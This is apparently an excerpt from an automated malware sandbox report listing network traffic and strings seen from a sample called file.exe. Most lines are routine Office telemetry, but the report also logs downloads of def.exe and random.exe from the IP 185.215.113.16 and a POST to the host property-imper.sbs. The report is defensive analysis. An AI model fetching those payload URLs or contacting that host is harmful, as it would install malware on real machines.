          Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
          Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
          Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
          Source: file.exe, file.exe, 00000000.00000003.2361368743.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
          Source: file.exe, file.exe, 00000000.00000003.2365723765.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2447108187.0000000000748000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361368743.0000000000782000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2447108187.0000000000776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
          Source: file.exe, 00000000.00000002.2446588189.00000000004FB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exepleWebKit/537.36
          Source: file.exe, file.exe, 00000000.00000003.2365723765.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361368743.0000000000782000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2447108187.0000000000776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
          Source: file.exe, 00000000.00000003.2365723765.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361368743.0000000000782000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2447108187.0000000000776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exeX
          Source: file.exe, 00000000.00000003.2148645899.0000000005455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: file.exe, 00000000.00000003.2148645899.0000000005455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: file.exe, 00000000.00000003.2256689314.00000000007CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro0
          Source: file.exe, 00000000.00000003.2148645899.0000000005455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: file.exe, 00000000.00000003.2148645899.0000000005455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: file.exe, 00000000.00000003.2148645899.0000000005455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: file.exe, 00000000.00000003.2148645899.0000000005455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: file.exe, 00000000.00000003.2148645899.0000000005455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: file.exe, 00000000.00000003.2148645899.0000000005455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
